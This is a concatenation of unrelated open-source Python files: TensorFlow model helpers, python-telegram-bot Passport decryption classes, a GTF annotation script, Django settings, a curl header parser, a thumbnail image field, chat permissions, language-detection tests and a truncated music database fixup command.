if os.path.exists(directory):
saver.restore(sess, directory + "/" + model_name);
else:
print("Error loading model!")
exit(-1)
def save_model(sess, model_name, directory="model"):
if not os.path.exists(directory):
os.makedirs(directory)
saver.save(sess, directory + "/" + model_name);
def save_outputs(sess, data, output_file_name, include_actual=True, batch=1):
# And finally write the results to an output file.
with open(output_file_name, "w") as out_file:
out_file.write("fname,label{0}\n".format(",actual" if include_actual else ""))
for i in range (1, batch + 1):
data_start = int(((i - 1) / batch) * data.everything.length)
data_end = int((i / batch) * data.everything.length)
results = sess.run(output, feed_dict={x: data.everything.xs[data_start:data_end], keep_prob: 1.0, y_: data.everything.ys[data_start:data_end]})
for filename, prediction, actual in zip(data.everything.filenames[data_start:data_end], results, data.everything.ys[data_start:data_end]):
out_file.write("{0},{1}{2}\n".format(filename, RESULT_MAP[prediction], ("," + RESULT_MAP[actual.index(1)]) if include_actual else ""))
if batch > 1:
progress = int((i / batch) * 10)
print('\rSaving results: [{0}{1}] {2}%'.format('#' * progress, ' ' * (10 - progress), round(10 * progress, 2)), end=" ")
if batch > 1:
print()
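    # Illustrative end-to-end usage of the helpers above (assumes `data` is a
    # loaded dataset object with the training/testing splits built earlier;
    # the log directory, model name and epoch count are hypothetical):
    #
    #     sess, merged_summary, writer = setup("logs/run1")
    #     for epoch in range(100):
    #         train_summary(sess, data, merged_summary, writer, batch=10)
    #     print("train accuracy: %.2f%%" % get_train_accuracy(sess, data, batch=10))
    #     print("test accuracy:  %.2f%%" % get_test_accuracy(sess, data, batch=10))
    #     save_model(sess, "example_model")
    #     save_outputs(sess, data, "predictions.csv", batch=10)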
| mit | 5,033,618,991,164,514,000 | 50.929766 | 183 | 0.638243 | false |
noam09/deluge-telegramer | telegramer/include/telegram/passport/credentials.py | 1 | 17262 | #!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2018
# Leandro Toledo de Souza <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
try:
import ujson as json
except ImportError:
import json
from base64 import b64decode
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric.padding import OAEP, MGF1
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CBC
from cryptography.hazmat.primitives.hashes import SHA512, SHA256, Hash, SHA1
from future.utils import bord
from telegram import TelegramObject, TelegramError
class TelegramDecryptionError(TelegramError):
"""
Something went wrong with decryption.
"""
def __init__(self, message):
super(TelegramDecryptionError, self).__init__("TelegramDecryptionError: "
"{}".format(message))
def decrypt(secret, hash, data):
"""
Decrypt per telegram docs at https://core.telegram.org/passport.
Args:
secret (:obj:`str` or :obj:`bytes`): The encryption secret, either as bytes or as a
base64 encoded string.
hash (:obj:`str` or :obj:`bytes`): The hash, either as bytes or as a
base64 encoded string.
data (:obj:`str` or :obj:`bytes`): The data to decrypt, either as bytes or as a
base64 encoded string.
Raises:
:class:`TelegramDecryptionError`: Given hash does not match hash of decrypted data.
Returns:
:obj:`bytes`: The decrypted data as bytes.
"""
    # Make a SHA512 hash of secret + hash
digest = Hash(SHA512(), backend=default_backend())
digest.update(secret + hash)
secret_hash_hash = digest.finalize()
# First 32 chars is our key, next 16 is the initialisation vector
key, iv = secret_hash_hash[:32], secret_hash_hash[32:32 + 16]
# Init a AES-CBC cipher and decrypt the data
cipher = Cipher(AES(key), CBC(iv), backend=default_backend())
decryptor = cipher.decryptor()
data = decryptor.update(data) + decryptor.finalize()
# Calculate SHA256 hash of the decrypted data
digest = Hash(SHA256(), backend=default_backend())
digest.update(data)
data_hash = digest.finalize()
# If the newly calculated hash did not match the one telegram gave us
if data_hash != hash:
# Raise a error that is caught inside telegram.PassportData and transformed into a warning
raise TelegramDecryptionError("Hashes are not equal! {} != {}".format(data_hash, hash))
# Return data without padding
return data[bord(data[0]):]
def decrypt_json(secret, hash, data):
"""Decrypts data using secret and hash and then decodes utf-8 string and loads json"""
return json.loads(decrypt(secret, hash, data).decode('utf-8'))
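# Illustrative only -- decrypt() operates on raw bytes, so the base64-encoded
# fields coming from the Bot API must be decoded first (this mirrors what
# EncryptedCredentials.decrypted_data does below; `decrypted_secret` and
# `credentials` are hypothetical variables):
#
#     from base64 import b64decode
#     payload = decrypt_json(decrypted_secret,
#                            b64decode(credentials.hash),
#                            b64decode(credentials.data))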
class EncryptedCredentials(TelegramObject):
"""Contains data required for decrypting and authenticating EncryptedPassportElement. See the
Telegram Passport Documentation for a complete description of the data decryption and
authentication processes.
Attributes:
data (:class:`telegram.Credentials` or :obj:`str`): Decrypted data with unique user's
nonce, data hashes and secrets used for EncryptedPassportElement decryption and
authentication or base64 encrypted data.
hash (:obj:`str`): Base64-encoded data hash for data authentication.
secret (:obj:`str`): Decrypted or encrypted secret used for decryption.
Args:
data (:class:`telegram.Credentials` or :obj:`str`): Decrypted data with unique user's
nonce, data hashes and secrets used for EncryptedPassportElement decryption and
authentication or base64 encrypted data.
hash (:obj:`str`): Base64-encoded data hash for data authentication.
secret (:obj:`str`): Decrypted or encrypted secret used for decryption.
**kwargs (:obj:`dict`): Arbitrary keyword arguments.
Note:
This object is decrypted only when originating from
:obj:`telegram.PassportData.decrypted_credentials`.
"""
def __init__(self, data, hash, secret, bot=None, **kwargs):
# Required
self.data = data
self.hash = hash
self.secret = secret
self._id_attrs = (self.data, self.hash, self.secret)
self.bot = bot
self._decrypted_secret = None
self._decrypted_data = None
@classmethod
def de_json(cls, data, bot):
if not data:
return None
data = super(EncryptedCredentials, cls).de_json(data, bot)
return cls(bot=bot, **data)
@property
def decrypted_secret(self):
"""
:obj:`str`: Lazily decrypt and return secret.
Raises:
telegram.TelegramDecryptionError: Decryption failed. Usually due to bad
private/public key but can also suggest malformed/tampered data.
"""
if self._decrypted_secret is None:
# Try decrypting according to step 1 at
# https://core.telegram.org/passport#decrypting-data
# We make sure to base64 decode the secret first.
# Telegram says to use OAEP padding so we do that. The Mask Generation Function
# is the default for OAEP, the algorithm is the default for PHP which is what
# Telegram's backend servers run.
try:
self._decrypted_secret = self.bot.private_key.decrypt(b64decode(self.secret), OAEP(
mgf=MGF1(algorithm=SHA1()),
algorithm=SHA1(),
label=None
))
except ValueError as e:
# If decryption fails raise exception
raise TelegramDecryptionError(e)
return self._decrypted_secret
@property
def decrypted_data(self):
"""
:class:`telegram.Credentials`: Lazily decrypt and return credentials data. This object
also contains the user specified nonce as
`decrypted_data.nonce`.
Raises:
telegram.TelegramDecryptionError: Decryption failed. Usually due to bad
private/public key but can also suggest malformed/tampered data.
"""
if self._decrypted_data is None:
self._decrypted_data = Credentials.de_json(decrypt_json(self.decrypted_secret,
b64decode(self.hash),
b64decode(self.data)),
self.bot)
return self._decrypted_data
class Credentials(TelegramObject):
"""
Attributes:
secure_data (:class:`telegram.SecureData`): Credentials for encrypted data
nonce (:obj:`str`): Bot-specified nonce
"""
def __init__(self, secure_data, nonce, bot=None, **kwargs):
# Required
self.secure_data = secure_data
self.nonce = nonce
self.bot = bot
@classmethod
def de_json(cls, data, bot):
if not data:
return None
data['secure_data'] = SecureData.de_json(data.get('secure_data'), bot=bot)
return cls(bot=bot, **data)
class SecureData(TelegramObject):
"""
This object represents the credentials that were used to decrypt the encrypted data.
All fields are optional and depend on fields that were requested.
Attributes:
personal_details (:class:`telegram.SecureValue`, optional): Credentials for encrypted
personal details.
passport (:class:`telegram.SecureValue`, optional): Credentials for encrypted passport.
internal_passport (:class:`telegram.SecureValue`, optional): Credentials for encrypted
internal passport.
driver_license (:class:`telegram.SecureValue`, optional): Credentials for encrypted
driver license.
identity_card (:class:`telegram.SecureValue`, optional): Credentials for encrypted ID card
address (:class:`telegram.SecureValue`, optional): Credentials for encrypted
residential address.
utility_bill (:class:`telegram.SecureValue`, optional): Credentials for encrypted
utility bill.
bank_statement (:class:`telegram.SecureValue`, optional): Credentials for encrypted
bank statement.
rental_agreement (:class:`telegram.SecureValue`, optional): Credentials for encrypted
rental agreement.
passport_registration (:class:`telegram.SecureValue`, optional): Credentials for encrypted
registration from internal passport.
temporary_registration (:class:`telegram.SecureValue`, optional): Credentials for encrypted
temporary registration.
"""
def __init__(self,
personal_details=None,
passport=None,
internal_passport=None,
driver_license=None,
identity_card=None,
address=None,
utility_bill=None,
bank_statement=None,
rental_agreement=None,
passport_registration=None,
temporary_registration=None,
bot=None,
**kwargs):
# Optionals
self.temporary_registration = temporary_registration
self.passport_registration = passport_registration
self.rental_agreement = rental_agreement
self.bank_statement = bank_statement
self.utility_bill = utility_bill
self.address = address
self.identity_card = identity_card
self.driver_license = driver_license
self.internal_passport = internal_passport
self.passport = passport
self.personal_details = personal_details
self.bot = bot
@classmethod
def de_json(cls, data, bot):
if not data:
return None
data['temporary_registration'] = SecureValue.de_json(data.get('temporary_registration'),
bot=bot)
data['passport_registration'] = SecureValue.de_json(data.get('passport_registration'),
bot=bot)
data['rental_agreement'] = SecureValue.de_json(data.get('rental_agreement'), bot=bot)
data['bank_statement'] = SecureValue.de_json(data.get('bank_statement'), bot=bot)
data['utility_bill'] = SecureValue.de_json(data.get('utility_bill'), bot=bot)
data['address'] = SecureValue.de_json(data.get('address'), bot=bot)
data['identity_card'] = SecureValue.de_json(data.get('identity_card'), bot=bot)
data['driver_license'] = SecureValue.de_json(data.get('driver_license'), bot=bot)
data['internal_passport'] = SecureValue.de_json(data.get('internal_passport'), bot=bot)
data['passport'] = SecureValue.de_json(data.get('passport'), bot=bot)
data['personal_details'] = SecureValue.de_json(data.get('personal_details'), bot=bot)
return cls(bot=bot, **data)
class SecureValue(TelegramObject):
"""
This object represents the credentials that were used to decrypt the encrypted value.
All fields are optional and depend on the type of field.
Attributes:
data (:class:`telegram.DataCredentials`, optional): Credentials for encrypted Telegram
Passport data. Available for "personal_details", "passport", "driver_license",
"identity_card", "identity_passport" and "address" types.
front_side (:class:`telegram.FileCredentials`, optional): Credentials for encrypted
document's front side. Available for "passport", "driver_license", "identity_card"
and "internal_passport".
reverse_side (:class:`telegram.FileCredentials`, optional): Credentials for encrypted
document's reverse side. Available for "driver_license" and "identity_card".
selfie (:class:`telegram.FileCredentials`, optional): Credentials for encrypted selfie
of the user with a document. Can be available for "passport", "driver_license",
"identity_card" and "internal_passport".
translation (List[:class:`telegram.FileCredentials`], optional): Credentials for an
encrypted translation of the document. Available for "passport", "driver_license",
"identity_card", "internal_passport", "utility_bill", "bank_statement",
"rental_agreement", "passport_registration" and "temporary_registration".
files (List[:class:`telegram.FileCredentials`], optional): Credentials for encrypted
files. Available for "utility_bill", "bank_statement", "rental_agreement",
"passport_registration" and "temporary_registration" types.
"""
def __init__(self,
data=None,
front_side=None,
reverse_side=None,
selfie=None,
files=None,
translation=None,
bot=None,
**kwargs):
self.data = data
self.front_side = front_side
self.reverse_side = reverse_side
self.selfie = selfie
self.files = files
self.translation = translation
self.bot = bot
@classmethod
def de_json(cls, data, bot):
if not data:
return None
data['data'] = DataCredentials.de_json(data.get('data'), bot=bot)
data['front_side'] = FileCredentials.de_json(data.get('front_side'), bot=bot)
data['reverse_side'] = FileCredentials.de_json(data.get('reverse_side'), bot=bot)
data['selfie'] = FileCredentials.de_json(data.get('selfie'), bot=bot)
data['files'] = FileCredentials.de_list(data.get('files'), bot=bot)
data['translation'] = FileCredentials.de_list(data.get('translation'), bot=bot)
return cls(bot=bot, **data)
def to_dict(self):
data = super(SecureValue, self).to_dict()
data['files'] = [p.to_dict() for p in self.files]
data['translation'] = [p.to_dict() for p in self.translation]
return data
class _CredentialsBase(TelegramObject):
"""Base class for DataCredentials and FileCredentials."""
def __init__(self, hash, secret, bot=None, **kwargs):
self.hash = hash
self.secret = secret
# Aliases just be be sure
self.file_hash = self.hash
self.data_hash = self.hash
self.bot = bot
@classmethod
def de_json(cls, data, bot):
if not data:
return None
return cls(bot=bot, **data)
@classmethod
def de_list(cls, data, bot):
if not data:
return []
credentials = list()
for c in data:
credentials.append(cls.de_json(c, bot=bot))
return credentials
class DataCredentials(_CredentialsBase):
"""
These credentials can be used to decrypt encrypted data from the data field in
EncryptedPassportData.
Args:
data_hash (:obj:`str`): Checksum of encrypted data
secret (:obj:`str`): Secret of encrypted data
Attributes:
hash (:obj:`str`): Checksum of encrypted data
secret (:obj:`str`): Secret of encrypted data
"""
def __init__(self, data_hash, secret, **kwargs):
super(DataCredentials, self).__init__(data_hash, secret, **kwargs)
def to_dict(self):
data = super(DataCredentials, self).to_dict()
del data['file_hash']
del data['hash']
return data
class FileCredentials(_CredentialsBase):
"""
These credentials can be used to decrypt encrypted files from the front_side,
reverse_side, selfie and files fields in EncryptedPassportData.
Args:
file_hash (:obj:`str`): Checksum of encrypted file
secret (:obj:`str`): Secret of encrypted file
Attributes:
hash (:obj:`str`): Checksum of encrypted file
secret (:obj:`str`): Secret of encrypted file
"""
def __init__(self, file_hash, secret, **kwargs):
super(FileCredentials, self).__init__(file_hash, secret, **kwargs)
def to_dict(self):
data = super(FileCredentials, self).to_dict()
del data['data_hash']
del data['hash']
return data
| gpl-3.0 | -7,892,456,958,463,140,000 | 38.321185 | 99 | 0.630344 | false |
ngsutils/ngsutils | ngsutils/gtf/add_xref.py | 1 | 3246 | #!/usr/bin/env python
## category General
## desc Appends name annotation from UCSC Xref file
'''Adds gene name annotations to a GTF file (xref)
This adds gene name annotations based upon the KnownGene annotations from the
UCSC Genome Browser. Gene names will be taken from the kgXref table. This
table must be downloaded separately from the UCSC Genome Browser.
This assumes that the file will be in tab-delimited format and that there is
one line for each transcript. You may specify which column represents the gene
name. In the standard "kgXref.txt" file, this is column #5.
This will add the following attributes:
gene_name
'''
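# Illustrative invocation and kgXref row (abridged, hypothetical values); with
# the default column (5, 1-based) the gene symbol is attached as gene_name:
#
#     gtfutils add_xref -col 5 knownGene.gtf kgXref.txt > knownGene.xref.gtf
#
#     kgXref.txt row:  uc001aaa.3<TAB>NR_046018<TAB>...<TAB>DDX11L1<TAB>...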
import sys
import os
from ngsutils.support import gzip_reader
def gtf_add_xref(gtf, xref, column=4, out=sys.stdout, quiet=False):
gene_names = {}
if not quiet:
sys.stderr.write('Reading xref...\n')
for line in gzip_reader(xref):
if line[0] == '#':
continue
cols = line.rstrip().split('\t')
gene_names[cols[0]] = cols[column]
if not quiet:
sys.stderr.write('Reading/writing GTF...\n')
for line in gzip_reader(gtf):
try:
comment = None
idx = line.find('#')
if idx > -1:
if idx == 0:
sys.stdout.write(line)
continue
comment = line[idx:]
line = line[:-idx]
chrom, source, feature, start, end, score, strand, frame, attrs = line.rstrip().split('\t')
transcript_id = None
for key, val in [x.split(' ') for x in [x.strip() for x in attrs.split(';')] if x]:
if val[0] == '"' and val[-1] == '"':
val = val[1:-1]
if key == 'transcript_id':
transcript_id = val
if attrs[-1] != ';':
attrs = '%s;' % attrs
if transcript_id in gene_names:
attrs = '%s gene_name "%s";' % (attrs, gene_names[transcript_id])
out.write('\t'.join([chrom, source, feature, start, end, score, strand, frame, attrs]))
if comment:
out.write('\t%s' % comment)
out.write('\n')
except:
import traceback
sys.stderr.write('Error parsing line:\n%s\n' % line)
traceback.print_exc()
sys.exit(1)
def usage(msg=None):
if msg:
print msg
print __doc__
print '''\
Usage: gtfutils add_xref {-col num} filename.gtf kgXref.txt
Options:
-col num The gene name is stored in column {num} (1-based)
(default:5)
'''
sys.exit(1)
if __name__ == '__main__':
gtf = None
xref = None
column = 4
last = None
for arg in sys.argv[1:]:
if last == '-col':
column = int(arg) - 1
last = None
elif not gtf and (os.path.exists(arg) or arg == '-'):
gtf = arg
elif not xref and (os.path.exists(arg) or arg == '-'):
xref = arg
elif arg in ['-col']:
last = arg
if not gtf or not xref:
usage()
if gtf == '-' and xref == '-':
usage('Both GTF and Xref files can not be from stdin')
gtf_add_xref(gtf, xref, column)
| bsd-3-clause | -469,859,513,389,635,600 | 29.336449 | 103 | 0.541282 | false |
parksandwildlife/ibms | ibms_project/settings.py | 1 | 5554 | from dbca_utils.utils import env
import dj_database_url
import os
from pathlib import Path
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = str(Path(__file__).resolve().parents[1])
PROJECT_DIR = str(Path(__file__).resolve().parents[0])
# Add PROJECT_DIR to the system path.
sys.path.insert(0, PROJECT_DIR)
# Settings defined in environment variables.
DEBUG = env('DEBUG', False)
SECRET_KEY = env('SECRET_KEY', 'PlaceholderSecretKey')
CSRF_COOKIE_SECURE = env('CSRF_COOKIE_SECURE', False)
SESSION_COOKIE_SECURE = env('SESSION_COOKIE_SECURE', False)
if not DEBUG:
ALLOWED_HOSTS = env('ALLOWED_DOMAINS', '').split(',')
else:
ALLOWED_HOSTS = ['*']
INTERNAL_IPS = ['127.0.0.1', '::1']
ROOT_URLCONF = 'ibms_project.urls'
WSGI_APPLICATION = 'ibms_project.wsgi.application'
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django_extensions',
'raven.contrib.django.raven_compat',
'crispy_forms',
'webtemplate_dbca',
'ibms',
'sfm',
)
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'dbca_utils.middleware.SSOLoginMiddleware',
]
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': (os.path.join(BASE_DIR, 'ibms_project', 'templates'),),
'APP_DIRS': True,
'OPTIONS': {
'debug': DEBUG,
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.template.context_processors.request',
'django.template.context_processors.csrf',
'django.contrib.messages.context_processors.messages',
'ibms_project.context_processors.standard'
],
},
}
]
SITE_TITLE = 'Integrated Business Management System'
SITE_ACRONYM = 'IBMS'
APPLICATION_VERSION_NO = '2.4.5'
ADMINS = ('[email protected]',)
MANAGERS = (
('Graham Holmes', '[email protected]', '9881 9212'),
('Neil Clancy', '[email protected]', '9219 9926'),
)
SITE_ID = 1
ANONYMOUS_USER_ID = 1
LOGIN_URL = '/login/'
LOGIN_REDIRECT_URL = '/'
CONFLUENCE_URL = env('CONFLUENCE_URL', '')
# URLs to the IBM Code Updater spreadsheets on Confluence, so that the Custodian
# can update them without a code change.
IBM_CODE_UPDATER_URI = env('IBM_CODE_UPDATER_URI', '')
IBM_SERVICE_PRIORITY_URI = env('IBM_SERVICE_PRIORITY_URI', '')
IBM_RELOAD_URI = env('IBM_RELOAD_URI', '')
IBM_DATA_AMEND_URI = env('IBM_DATA_AMEND_URI', '')
HELP_URL = CONFLUENCE_URL
CRISPY_TEMPLATE_PACK = 'bootstrap3'
DATA_UPLOAD_MAX_NUMBER_FIELDS = None # Required to allow end-of-month GLPivot bulk deletes.
# Database configuration
DATABASES = {
# Defined in DATABASE_URL env variable.
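    # e.g. DATABASE_URL=postgres://ibms_user:password@localhost:5432/ibms (illustrative value)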
'default': dj_database_url.config(),
}
# Static files (CSS, JavaScript, Images)
# Ensure that the media directory exists:
if not os.path.exists(os.path.join(BASE_DIR, 'media')):
os.mkdir(os.path.join(BASE_DIR, 'media'))
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
STATICFILES_DIRS = (os.path.join(PROJECT_DIR, 'static'), )
# Internationalisation.
USE_I18N = False
USE_TZ = True
TIME_ZONE = 'Australia/Perth'
LANGUAGE_CODE = 'en-us'
DATE_INPUT_FORMATS = (
'%d/%m/%y',
'%d/%m/%Y',
'%d-%m-%y',
'%d-%m-%Y',
'%d %b %Y',
'%d %b, %Y',
'%d %B %Y',
'%d %B, %Y')
DATETIME_INPUT_FORMATS = (
'%d/%m/%y %H:%M',
'%d/%m/%Y %H:%M',
'%d-%m-%y %H:%M',
'%d-%m-%Y %H:%M',)
# Email settings.
EMAIL_HOST = env('EMAIL_HOST', 'email.host')
EMAIL_PORT = env('EMAIL_PORT', 25)
# Logging settings - log to stdout/stderr
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'console': {'format': '%(asctime)s %(name)-12s %(message)s'},
'verbose': {'format': '%(asctime)s %(levelname)-8s %(message)s'},
},
'handlers': {
'console': {
'level': 'INFO',
'class': 'logging.StreamHandler',
'formatter': 'console'
},
'sentry': {
'level': 'WARNING',
'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',
},
},
'loggers': {
'django': {
'handlers': ['console'],
'propagate': True,
},
'django.request': {
'handlers': ['console', 'sentry'],
'level': 'WARNING',
'propagate': False,
},
'ibms': {
'handlers': ['console'],
'level': 'INFO'
},
}
}
# Sentry configuration
if env('RAVEN_DSN', False):
RAVEN_CONFIG = {'dsn': env('RAVEN_DSN')}
| apache-2.0 | -416,039,170,357,673,500 | 29.685083 | 92 | 0.618833 | false |
Seegnify/Elasticcrawler | lib/curlheaders.py | 1 | 1702 | """
API to extract bits and pieces from CURL (command line utility) headers file.
The headers can be obtained by calling: curl -D 'headers' 'url'.
Currenlty supported formats are for protocols: HTTP, HTTPS.
"""
class Curlheaders:
# response codes and headers container
    responses = list()
def __init__(self, headers = None):
if headers is not None:
self.load(headers)
def load(self, headers):
# read headers
with open(headers) as f:
lines = [line.strip() for line in f]
# create response list
resps = list()
line_iter = iter(lines)
# consume response code
line = next(line_iter, None)
resp = dict()
resp['code'] = line.split()[1]
resp['head'] = dict()
# iterate over headers
for line in line_iter:
            if len(line) == 0:
# append last response
resps.append(resp)
# consume response code
line = next(line_iter, None)
if line is None: break
resp = dict()
resp['code'] = line.split()[1]
resp['head'] = dict()
else:
# consume response header
head = line.find(': ')
name = line[0:head].lower()
val = line[head+2:len(line)]
resp['head'][name] = val
# update loaded reponses
self.responses = resps
def response_count(self):
return len(self.responses)
def http_code(self, response_index):
return self.responses[response_index]['code']
def http_header(self, response_index, header_name):
header_name = header_name.lower()
try:
return self.responses[response_index]['head'][header_name]
except KeyError:
return None
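# Illustrative usage, given a headers file captured with e.g.
# `curl -s -D headers.txt -o /dev/null <url>`:
#
#     ch = Curlheaders('headers.txt')
#     last = ch.response_count() - 1
#     ch.http_code(last)                       # e.g. '200'
#     ch.http_header(last, 'Content-Type')     # e.g. 'text/html; charset=UTF-8', or None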
| bsd-3-clause | 1,003,504,171,861,701,200 | 25.59375 | 77 | 0.59342 | false |
raviii/ravii | items/fields.py | 1 | 1881 | from django.db.models.fields.files import ImageField, ImageFieldFile
from PIL import Image
import os
def _add_thumb(s):
"""
    Modifies a string (filename, URL) containing an image filename, inserting
    '.thumb' before the extension and forcing the extension to .jpg.
"""
parts = s.split(".")
parts.insert(-1, "thumb")
if parts[-1].lower() not in ['jpeg', 'jpg']:
parts[-1] = 'jpg'
return ".".join(parts)
class ThumbnailImageFieldFile(ImageFieldFile):
def _get_thumb_path(self):
return _add_thumb(self.path)
thumb_path = property(_get_thumb_path)
def _get_thumb_url(self):
return _add_thumb(self.url)
thumb_url = property(_get_thumb_url)
def save(self, name, content, save=True):
super(ThumbnailImageFieldFile, self).save(name, content, save)
img = Image.open(self.path)
img.thumbnail(
(self.field.thumb_width, self.field.thumb_height),
Image.ANTIALIAS
)
img.save(self.thumb_path, 'JPEG')
def delete(self, save=True):
if os.path.exists(self.thumb_path):
os.remove(self.thumb_path)
super(ThumbnailImageFieldFile, self).delete(save)
class ThumbnailImageField(ImageField):
"""
Behaves like a regular ImageField, but stores an extra (JPEG) thumbnail
image, providing FIELD.thumb_url and FIELD.thumb_path.
Accepts two additional, optional arguments: thumb_width and thumb_height,
both defaulting to 128 (pixels). Resizing will preserve aspect ratio while
staying inside the requested dimensions; see PIL's Image.thumbnail()
method documentation for details.
"""
attr_class = ThumbnailImageFieldFile
def __init__(self, thumb_width=128, thumb_height=128, *args, **kwargs):
self.thumb_width = thumb_width
self.thumb_height = thumb_height
super(ThumbnailImageField, self).__init__(*args, **kwargs)
| bsd-3-clause | 6,572,445,099,955,995,000 | 33.2 | 78 | 0.654971 | false |
rdujardin/icforum | icforum/chat/api/permissions.py | 1 | 1257 | # Copyright 2016 Infinite Connection
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from rest_framework import permissions
class RoomPermission(permissions.BasePermission):
"""
Custom permission to allow only members of a room to see it.
"""
def has_object_permission(self, request, view, obj):
return request.user in obj.members.all()
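# Illustrative wiring in a DRF view (view name is hypothetical):
#
#     class RoomViewSet(viewsets.ModelViewSet):
#         permission_classes = (permissions.IsAuthenticated, RoomPermission)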
class ChatMessagePermission(permissions.BasePermission):
"""
Custom permission to allow only members of a room to post in it and allow only authors to edit their messages.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return request.user in obj.room.members.all()
return obj.author == request.user and request.user in obj.room.members.all()
| apache-2.0 | 5,509,194,607,901,554,000 | 35.970588 | 111 | 0.762928 | false |
trec-kba/streamcorpus-pipeline | streamcorpus_pipeline/tests/test_language.py | 1 | 1657 | '''tests for langauge detection transform
.. This software is released under an MIT/X11 open source license.
Copyright 2012-2015 Diffeo, Inc.
'''
from __future__ import absolute_import
import os
import pytest
import streamcorpus_pipeline
from streamcorpus_pipeline._clean_html import clean_html
from streamcorpus_pipeline._language import language
from streamcorpus import make_stream_item, ContentItem
@pytest.mark.skipif(True, reason='no longer used')
def test_langauge(test_data_dir):
path = os.path.join(test_data_dir, 'test/raw-unicode-issues.html')
si = make_stream_item(None, 'test')
si.body = ContentItem(raw=open(path).read())
context = {}
lang = language(config={})
lang(si, context)
assert si.body.language.name == 'Japanese'
assert si.body.language.code == 'ja'
@pytest.mark.skipif(True, reason='no longer used')
@pytest.mark.parametrize('with_clean_html', [(True,), (False,)])
def test_language_unreliable_on_raw(test_data_dir, with_clean_html):
path = os.path.join(test_data_dir, 'test/unreliable-language-detect-on-raw.html')
si = make_stream_item(None, 'http://bbs.sjtu.edu.cn/bbsanc?path=%2Fgroups%2FGROUP_0%2Fmessage%2FD4EFC2634%2FD7AC8E3A8%2FG.1092960050.A')
raw = open(path).read()
#raw = raw.decode('GB2312', 'ignore').encode('utf8')
si.body = ContentItem(raw=raw)
si.body.encoding = 'GB2312'
si.body.media_type = 'text/html'
context = {}
if with_clean_html:
ch = clean_html(config={})
ch(si, context)
lang = language(config={})
lang(si, context)
assert si.body.language.name == 'Chinese'
assert si.body.language.code == 'zh'
| mit | -3,371,838,387,927,223,000 | 35.021739 | 140 | 0.694629 | false |
MechanisM/musicdb | musicdb/common/management/commands/initial_import_fixups.py | 1 | 3570 | from django.core.management.base import NoArgsCommand
from musicdb.classical.models import *
class Command(NoArgsCommand):
def handle_noargs(self, **options):
work_pairs = (
('felix-mendelssohn', ('string-quartet-in-e-flat', 'string-quartet-in-e-flat-1')),
('ludvig-van-beethoven', ('piano-trio-in-e-flat-triosatz', 'piano-trio-in-e-flat-triosatz-1')),
('fryderyk-chopin', ('ballade-no-4-op-52-in-f-minor', 'ballade-no-4-op-52-in-f-minor-1')),
)
for a, (b, c) in work_pairs:
try:
Work.objects.get(composer__slug=a, slug=b).merge_from(
Work.objects.get(composer__slug=a, slug=c)
)
except Work.DoesNotExist:
print "W: Skipping", a, b, c
ensemble_pairs = (
('chamber-orchestra-of-europe', 'chamber-orchestra-of-europe-1'),
('orquestra-sinfonica-haydn-de-bolzano-e-trento', 'orquestra-sinfonica-haydn-de-bolzano-e-trento-1'),
('i-solisti-veneti', 'i-solisti-veneti-1'),
('london-symphony-orchestra', 'london-symphony-orchestra-principals'),
('vienna-philharmonic-orchestra', 'wiener-philharmoniker'),
)
for a, b in ensemble_pairs:
try:
Ensemble.objects.get(slug=a).merge_from(Ensemble.objects.get(slug=b))
except Ensemble.DoesNotExist:
print "W: Skipping", a, b
relationships = {
'arrangement': (
('orchesographie', 'capriol-suite-for-string-orchestra'),
),
'revision': (
('brandenburg-concerto-no-5-early-version-bwv-1050a-in-d', 'brandenburg-concerto-no-5-bwv-1050-in-d'),
('brandenburg-concerto-no-1-early-version-bwv-1046a-in-f', 'brandenburg-concerto-no-1-bwv-1046-in-f'),
),
'variations': (
('twelve-variations-on-ah-vous-dirai-je-maman-k-265-in-c', 'romantic-piece-op-18'),
),
'transcription': (
('brandenburg-concerto-no-4-bwv-1049-in-g', 'concerto-for-harpsichord-and-two-recorders-transcription-of-brandenburg-concerto-no-4-bwv-1057'),
('violin-concerto-bwv-1041-in-a-minor', 'harpsichord-concerto-bwv-1058r-in-g-minor'),
('violin-concerto-bwv-1042-in-e', 'harpsichord-concerto-bwv-1054-in-d'),
